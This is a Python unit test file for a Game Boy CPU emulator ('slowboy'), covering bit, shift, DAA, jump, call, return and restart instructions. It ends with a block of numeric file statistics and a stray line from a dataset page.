self.assertEqual(self.cpu.get_reg8('b'), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_srl_regHLaddr_1(self):
addr = 0xc000
self.cpu.set_reg16('hl', addr)
self.cpu.mmu.set_addr(addr, 0xa5)
self.cpu.srl_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.get_reg16('hl')), 0x52)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_srl_regHLaddr_2(self):
addr = 0xc000
self.cpu.set_reg16('hl', addr)
self.cpu.mmu.set_addr(addr, 0xa4)
self.cpu.srl_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.get_reg16('hl')), 0x52)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_srl_regHLaddr_3(self):
# Make sure the zero flag gets set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x01)
self.cpu.srl_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_bit_reg8_1(self):
# Make sure zero flag does not get set
self.cpu.set_reg8('c', 0x10)
self.cpu.set_zero_flag()
self.cpu.bit_reg8(4, 'c')()
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
def test_bit_reg8_2(self):
# Make sure zero flag gets set
self.cpu.set_reg8('c', 0x10)
self.cpu.reset_zero_flag()
self.cpu.bit_reg8(5, 'c')()
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
def test_bit_regHLaddr_1(self):
# Make sure zero flag does not get set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x10)
self.cpu.set_zero_flag()
self.cpu.bit_regHLaddr(4)()
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
def test_bit_regHLaddr_2(self):
# Make sure zero flag gets set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x10)
self.cpu.reset_zero_flag()
self.cpu.bit_regHLaddr(5)()
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
def test_res_reg8_1(self):
self.cpu.set_reg8('d', 0x10)
self.cpu.res_reg8(4, 'd')()
self.assertEqual(self.cpu.get_reg8('d'), 0x00)
def test_res_reg8_2(self):
self.cpu.set_reg8('d', 0x00)
self.cpu.res_reg8(4, 'd')()
self.assertEqual(self.cpu.get_reg8('d'), 0x00)
def test_res_regHLaddr(self):
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x10)
self.cpu.res_regHLaddr(4)()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x00)
def test_set__reg8_1(self):
self.cpu.set_reg8('d', 0x00)
self.cpu.set__reg8(4, 'd')()
self.assertEqual(self.cpu.get_reg8('d'), 0x10)
def test_set_reg8_2(self):
self.cpu.set_reg8('d', 0x10)
self.cpu.set__reg8(4, 'd')()
self.assertEqual(self.cpu.get_reg8('d'), 0x10)
def test_set_regHLaddr(self):
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x00)
self.cpu.set_regHLaddr(4)()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x10)
def test_swap_reg8_1(self):
# Make sure the zero flag does not get set
self.cpu.set_reg8('c', 0xb4)
self.cpu.set_zero_flag()
self.cpu.swap_reg8('c')()
self.assertEqual(self.cpu.get_reg8('c'), 0x4b)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_swap_reg8_2(self):
# Make sure the zero flag gets set
self.cpu.set_reg8('c', 0x00)
self.cpu.reset_zero_flag()
self.cpu.swap_reg8('c')()
self.assertEqual(self.cpu.get_reg8('c'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_swap_regHLaddr_1(self):
# Make sure the zero flag does not get set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0xb4)
self.cpu.set_zero_flag()
self.cpu.swap_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x4b)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_swap_regHLaddr_2(self):
# Make sure the zero flag gets set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x00)
self.cpu.reset_zero_flag()
self.cpu.swap_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_cpl(self):
self.cpu.set_reg8('a', 0x55)
self.cpu.cpl()
self.assertEqual(self.cpu.get_reg8('a'), 0xaa)
def test_daa_1(self):
self.cpu.reset_sub_flag()
self.cpu.reset_carry_flag()
self.cpu.reset_halfcarry_flag()
self.cpu.set_reg8('a', 0x88)
self.cpu.daa()
self.assertEqual(self.cpu.get_reg8('a'), 0x88)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_daa_2(self):
# 28 = 0x1c
self.cpu.set_reg8('a', 28)
self.cpu.reset_carry_flag()
self.cpu.reset_halfcarry_flag()
self.cpu.reset_sub_flag()
self.cpu.daa()
self.assertEqual(self.cpu.get_reg8('a'), 34)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_daa_3(self):
self.cpu.reset_sub_flag()
self.cpu.reset_carry_flag()
self.cpu.set_halfcarry_flag()
self.cpu.set_reg8('a', 0x82)
self.cpu.daa()
# add 0x06
self.assertEqual(self.cpu.get_reg8('a'), 0x88)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_daa_4(self):
self.cpu.reset_sub_flag()
self.cpu.reset_carry_flag()
self.cpu.reset_halfcarry_flag()
self.cpu.set_reg8('a', 0xa8)
self.cpu.daa()
# add 0x60
self.assertEqual(self.cpu.get_reg8('a'), 0x08)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_daa_5(self):
self.cpu.reset_sub_flag()
self.cpu.reset_carry_flag()
self.cpu.reset_halfcarry_flag()
self.cpu.set_reg8('a', 0x9a)
self.cpu.daa()
# add 0x66
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_daa_6(self):
self.cpu.reset_sub_flag()
self.cpu.reset_carry_flag()
self.cpu.set_halfcarry_flag()
self.cpu.set_reg8('a', 0xa3)
self.cpu.daa()
# add 0x66
self.assertEqual(self.cpu.get_reg8('a'), 0x09)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_daa_7(self):
self.cpu.reset_sub_flag()
self.cpu.set_carry_flag()
self.cpu.reset_halfcarry_flag()
self.cpu.set_reg8('a', 0x18)
self.cpu.daa()
# add 0x60
self.assertEqual(self.cpu.get_reg8('a'), 0x78)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_daa_8(self):
self.cpu.reset_sub_flag()
self.cpu.set_carry_flag()
self.cpu.reset_halfcarry_flag()
self.cpu.set_reg8('a', 0x1a)
self.cpu.daa()
# add 0x66
self.assertEqual(self.cpu.get_reg8('a'), 0x80)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_daa_9(self):
self.cpu.reset_sub_flag()
self.cpu.set_carry_flag()
self.cpu.set_halfcarry_flag()
self.cpu.set_reg8('a', 0x33)
self.cpu.daa()
# add 0x66
self.assertEqual(self.cpu.get_reg8('a'), 0x99)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_daa_10(self):
self.cpu.set_sub_flag()
self.cpu.reset_carry_flag()
self.cpu.reset_halfcarry_flag()
self.cpu.set_reg8('a', 0x99)
self.cpu.daa()
# add 0x00
self.assertEqual(self.cpu.get_reg8('a'), 0x99)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_daa_11(self):
self.cpu.set_sub_flag()
self.cpu.reset_carry_flag()
self.cpu.set_halfcarry_flag()
self.cpu.set_reg8('a', 0x88)
self.cpu.daa()
# add 0xfa
self.assertEqual(self.cpu.get_reg8('a'), 0x82)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_daa_12(self):
self.cpu.set_sub_flag()
self.cpu.set_carry_flag()
self.cpu.reset_halfcarry_flag()
self.cpu.set_reg8('a', 0x77)
self.cpu.daa()
# add 0xa0
self.assertEqual(self.cpu.get_reg8('a'), 0x17)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_daa_13(self):
self.cpu.set_sub_flag()
self.cpu.set_carry_flag()
self.cpu.set_halfcarry_flag()
self.cpu.set_reg8('a', 0x77)
self.cpu.daa()
# add 0x9a
self.assertEqual(self.cpu.get_reg8('a'), 0x11)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_daa_14(self):
with self.assertRaises(ValueError) as cm:
self.cpu.reset_sub_flag()
self.cpu.set_carry_flag()
self.cpu.set_halfcarry_flag()
self.cpu.set_reg8('a', 0x34)
self.cpu.daa()
def test_daa_15(self):
with self.assertRaises(ValueError) as cm:
self.cpu.set_sub_flag()
self.cpu.set_carry_flag()
self.cpu.set_halfcarry_flag()
self.cpu.set_reg8('a', 0x56)
self.cpu.daa()
def test_daa_16(self):
# Example from the Gameboy Programming Manual
self.cpu.reset_halfcarry_flag()
self.cpu.reset_carry_flag()
self.cpu.set_reg8('a', 0x45)
self.cpu.set_reg8('b', 0x38)
self.cpu.add_reg8toreg8('b', 'a')() # 0x7d, c=0, h=0
self.cpu.daa()
self.assertEqual(self.cpu.get_reg8('a'), 0x83)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.cpu.sub_reg8fromreg8('b', 'a')()
self.cpu.daa()
self.assertEqual(self.cpu.get_reg8('a'), 0x45)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_scf(self):
self.cpu.reset_carry_flag()
self.cpu.scf()
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.cpu.scf()
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_ccf(self):
self.cpu.set_carry_flag()
self.cpu.ccf()
self.assertEqual(self.cpu.get_carry_flag(), 0)
class TestZ80Control(unittest.TestCase):
def setUp(self):
self.cpu = slowboy.z80.Z80()
def test_jr_imm8(self):
self.cpu.pc = 0x1000
rom = [0 for _ in range(0x2000)]
rom[0x1000] = 0x20
self.cpu.mmu.rom = bytes(rom)
self.cpu.jr_imm8()()
self.assertEqual(self.cpu.get_pc(), 0x1021)
def test_jr_imm8_2(self):
self.cpu.pc = 0x1000
rom = [0 for _ in range(0x1001)]
rom[0x1000] = 0xe0
self.cpu.mmu.rom = bytes(rom)
self.cpu.jr_imm8()()
self.assertEqual(self.cpu.get_pc(), 0x0fe1)
def test_jr_imm8_nz(self):
self.cpu.pc = 0x1000
self.cpu.mmu.rom = bytes(0x20 for _ in range(0x1001))
self.cpu.reset_zero_flag()
self.cpu.jr_imm8('NZ')()
self.assertEqual(self.cpu.get_pc(), 0x1021)
def test_jr_imm8_z(self):
self.cpu.pc = 0x1000
self.cpu.mmu.rom = bytes(0x20 for _ in range(0x1001))
self.cpu.set_zero_flag()
self.cpu.jr_imm8('Z')()
self.assertEqual(self.cpu.get_pc(), 0x1021)
def test_jr_imm8_nc(self):
self.cpu.pc = 0x1000
self.cpu.mmu.rom = bytes(0x20 for _ in range(0x1001))
self.cpu.reset_carry_flag()
self.cpu.jr_imm8('NC')()
self.assertEqual(self.cpu.get_pc(), 0x1021)
def test_jr_imm8_c(self):
self.cpu.pc = 0x1000
self.cpu.mmu.rom = bytes(0x20 for _ in range(0x1001))
self.cpu.set_carry_flag()
self.cpu.jr_imm8('C')()
self.assertEqual(self.cpu.get_pc(), 0x1021)
def test_jr_imm8_c_2(self):
self.cpu.pc = 0x1000
# two's compl of 0x20 is 0xe0
self.cpu.mmu.rom = bytes(0xe0 for _ in range(0x1001))
self.cpu.set_carry_flag()
self.cpu.jr_imm8('C')()
# 0x1001 - 0x20 = 0x0fe1
self.assertEqual(self.cpu.get_pc(), 0x0fe1)
def test_jr_imm8_badcond(self):
with self.assertRaises(ValueError) as cm:
self.cpu.jr_imm8('A')()
def test_jp_imm16addr(self):
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0x00, 0xd0])
self.cpu.jp_imm16addr()()
self.assertEqual(self.cpu.get_pc(), 0xd000)
def test_jp_reg16addr(self):
self.cpu.pc = 0xc000
self.cpu.set_reg16('hl', 0xd000)
self.cpu.jp_reg16addr('hl')()
self.assertEqual(self.cpu.get_pc(), 0xd000)
def test_jp_imm16addr_nz(self):
# TODO? provide consistent ROM for testing in setup
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0x00, 0x20])
self.cpu.reset_zero_flag()
self.cpu.jp_imm16addr('NZ')()
self.assertEqual(self.cpu.pc, 0x2000)
def test_jp_imm16addr_z(self):
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0x00, 0x20])
self.cpu.set_zero_flag()
self.cpu.jp_imm16addr('Z')()
self.assertEqual(self.cpu.pc, 0x2000)
def test_jp_imm16addr_nc(self):
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0x00, 0x20])
self.cpu.reset_carry_flag()
self.cpu.jp_imm16addr('NC')()
self.assertEqual(self.cpu.pc, 0x2000)
def test_jp_imm16addr_c(self):
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0x00, 0x20])
self.cpu.set_carry_flag()
self.cpu.jp_imm16addr('C')()
self.assertEqual(self.cpu.pc, 0x2000)
def test_jp_imm16addr_badcond(self):
self.pc = 0
with self.assertRaises(ValueError) as cm:
self.cpu.mmu.rom = bytes([0x00, 0x20])
self.cpu.set_carry_flag()
self.cpu.jp_imm16addr('B')()
def test_ret(self):
self.cpu.pc = 0x1234
self.cpu.sp = 0xd000
self.cpu.mmu.set_addr(0xd000, 0x00)
self.cpu.mmu.set_addr(0xd001, 0xc0)
self.cpu.ret()()
self.assertEqual(self.cpu.get_pc(), 0xc000)
self.assertEqual(self.cpu.sp, 0xd002)
def test_ret_cond_z(self):
self.cpu.pc = 0x1234
self.cpu.sp = 0xd000
self.cpu.mmu.set_addr(0xd000, 0x00)
self.cpu.mmu.set_addr(0xd001, 0xc0)
self.cpu.reset_zero_flag()
self.cpu.ret(cond='z')()
self.assertEqual(self.cpu.get_pc(), 0x1234)
self.assertEqual(self.cpu.sp, 0xd000)
self.cpu.set_zero_flag()
self.cpu.ret(cond='z')()
self.assertEqual(self.cpu.get_pc(), 0xc000)
self.assertEqual(self.cpu.sp, 0xd002)
def test_ret_cond_nz(self):
self.cpu.pc = 0x1234
self.cpu.sp = 0xd000
self.cpu.mmu.set_addr(0xd000, 0x00)
self.cpu.mmu.set_addr(0xd001, 0xc0)
self.cpu.set_zero_flag()
self.cpu.ret(cond='nz')()
self.assertEqual(self.cpu.get_pc(), 0x1234)
self.assertEqual(self.cpu.sp, 0xd000)
self.cpu.reset_zero_flag()
self.cpu.ret(cond='nz')()
self.assertEqual(self.cpu.get_pc(), 0xc000)
self.assertEqual(self.cpu.sp, 0xd002)
def test_ret_cond_2_c(self):
self.cpu.pc = 0x1234
self.cpu.sp = 0xd000
self.cpu.mmu.set_addr(0xd000, 0x00)
self.cpu.mmu.set_addr(0xd001, 0xc0)
self.cpu.reset_carry_flag()
self.cpu.ret(cond='c')()
self.assertEqual(self.cpu.get_pc(), 0x1234)
self.assertEqual(self.cpu.sp, 0xd000)
self.cpu.set_carry_flag()
self.cpu.ret(cond='c')()
self.assertEqual(self.cpu.get_pc(), 0xc000)
self.assertEqual(self.cpu.sp, 0xd002)
def test_ret_cond_2_nc(self):
self.cpu.pc = 0x1234
self.cpu.sp = 0xd000
self.cpu.mmu.set_addr(0xd000, 0x00)
self.cpu.mmu.set_addr(0xd001, 0xc0)
self.cpu.set_carry_flag()
self.cpu.ret(cond='nc')()
self.assertEqual(self.cpu.get_pc(), 0x1234)
self.assertEqual(self.cpu.sp, 0xd000)
self.cpu.reset_carry_flag()
self.cpu.ret(cond='nc')()
self.assertEqual(self.cpu.get_pc(), 0xc000)
self.assertEqual(self.cpu.sp, 0xd002)
def test_ret_cond_2_badcond(self):
with self.assertRaises(ValueError) as cm:
self.cpu.ret(cond='aa')()
def test_reti(self):
self.cpu.pc = 0x1234
self.cpu.sp = 0xd000
self.cpu.mmu.set_addr(0xd000, 0x00)
self.cpu.mmu.set_addr(0xd001, 0xc0)
self.cpu.reti()
self.assertEqual(self.cpu.get_pc(), 0xc000)
self.assertEqual(self.cpu.sp, 0xd002)
def test_call_imm16addr(self):
self.cpu.pc = 0x1234
self.cpu.sp = 0xd000
rom = [0 for _ in range(0x2000)]
rom[0x1234] = 0x00
rom[0x1235] = 0x20
self.cpu.mmu.rom = bytes(rom)
self.cpu.call_imm16addr()()
self.assertEqual(self.cpu.get_pc(), 0x2000)
self.assertEqual(self.cpu.sp, 0xcffe)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp + 1), 0x12)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp), 0x36)
def test_call_imm16addr_z(self):
self.cpu.pc = 0x1234
self.cpu.sp = 0xd000
rom = [0 for _ in range(0x2000)]
rom[0x1234] = 0x00
rom[0x1235] = 0x20
rom[0x1236] = 0x00
rom[0x1237] = 0x20
self.cpu.mmu.rom = bytes(rom)
self.cpu.reset_zero_flag()
self.cpu.call_imm16addr('z')()
self.assertEqual(self.cpu.get_pc(), 0x1236)
self.assertEqual(self.cpu.sp, 0xd000)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp + 1), 0x00)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp), 0x00)
self.cpu.set_zero_flag()
self.cpu.call_imm16addr('z')()
self.assertEqual(self.cpu.get_pc(), 0x2000)
self.assertEqual(self.cpu.sp, 0xcffe)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp + 1), 0x12)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp), 0x38)
def test_call_imm16addr_nz(self):
self.cpu.pc = 0x1234
self.cpu.sp = 0xd000
rom = [0 for _ in range(0x2000)]
rom[0x1234] = 0x00
rom[0x1235] = 0x20
rom[0x1236] = 0x00
rom[0x1237] = 0x20
self.cpu.mmu.rom = bytes(rom)
self.cpu.set_zero_flag()
self.cpu.call_imm16addr('nz')()
self.assertEqual(self.cpu.get_pc(), 0x1236)
self.assertEqual(self.cpu.sp, 0xd000)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp + 1), 0x00)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp), 0x00)
self.cpu.reset_zero_flag()
self.cpu.call_imm16addr('nz')()
self.assertEqual(self.cpu.get_pc(), 0x2000)
self.assertEqual(self.cpu.sp, 0xcffe)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp + 1), 0x12)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp), 0x38)
def test_call_imm16addr_c(self):
self.cpu.pc = 0x1234
self.cpu.sp = 0xd000
rom = [0 for _ in range(0x2000)]
rom[0x1234] = 0x00
rom[0x1235] = 0x20
rom[0x1236] = 0x00
rom[0x1237] = 0x20
self.cpu.mmu.rom = bytes(rom)
self.cpu.reset_carry_flag()
self.cpu.call_imm16addr('c')()
self.assertEqual(self.cpu.get_pc(), 0x1236)
self.assertEqual(self.cpu.sp, 0xd000)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp + 1), 0x00)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp), 0x00)
self.cpu.set_carry_flag()
self.cpu.call_imm16addr('c')()
self.assertEqual(self.cpu.get_pc(), 0x2000)
self.assertEqual(self.cpu.sp, 0xcffe)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp + 1), 0x12)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp), 0x38)
def test_call_imm16addr_nc(self):
self.cpu.pc = 0x1234
self.cpu.sp = 0xd000
rom = [0 for _ in range(0x2000)]
rom[0x1234] = 0x00
rom[0x1235] = 0x20
rom[0x1236] = 0x00
rom[0x1237] = 0x20
self.cpu.mmu.rom = bytes(rom)
self.cpu.set_carry_flag()
self.cpu.call_imm16addr('nc')()
self.assertEqual(self.cpu.get_pc(), 0x1236)
self.assertEqual(self.cpu.sp, 0xd000)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp + 1), 0x00)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp), 0x00)
self.cpu.reset_carry_flag()
self.cpu.call_imm16addr('nc')()
self.assertEqual(self.cpu.get_pc(), 0x2000)
self.assertEqual(self.cpu.sp, 0xcffe)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp + 1), 0x12)
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.sp), 0x38)
def test_rst(self):
for addr in [0x00, 0x08, 0x10, 0x18, 0x20, 0x28, 0x30, 0x38]:
self.cpu.pc = 0x1234
self.cpu.sp = 0xd000
self.cpu.rst(addr)()
self.assertEqual(self.cpu.pc, addr)
self.assertEqual(self.cpu.sp, 0xcffe)
self.assertEqual(self.cpu.mmu.get_addr(0xcfff), 0x12)
self.assertEqual(self.cpu.mmu.get_addr(0xcffe), 0x34)
def test_call_imm16addr_badcond(self):
with self.assertRaises(ValueError) as cm:
self.cpu.call_imm16addr('aa')()
def test_stop(self):
# TODO
# for now, just make sure no exceptions are raised. later, we want to
# check that the CPU waited the appropriate number of cycles.
self.cpu.stop()
def test_halt(self):
# TODO
# for now, just make sure no exceptions are raised. later, we want to
# check that the CPU waited the appropriate number of cycles.
self.cpu.halt()
| 34.084479
| 79
| 0.62233
| 12,623
| 86,745
| 4.08231
| 0.02947
| 0.213134
| 0.270633
| 0.313365
| 0.935825
| 0.913314
| 0.893773
| 0.853137
| 0.825872
| 0.799674
| 0
| 0.068346
| 0.231195
| 86,745
| 2,544
| 80
| 34.097877
| 0.704348
| 0.038907
| 0
| 0.669003
| 0
| 0
| 0.009866
| 0
| 0
| 0
| 0.048695
| 0.000786
| 0.410782
| 1
| 0.121294
| false
| 0
| 0.001078
| 0
| 0.124528
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.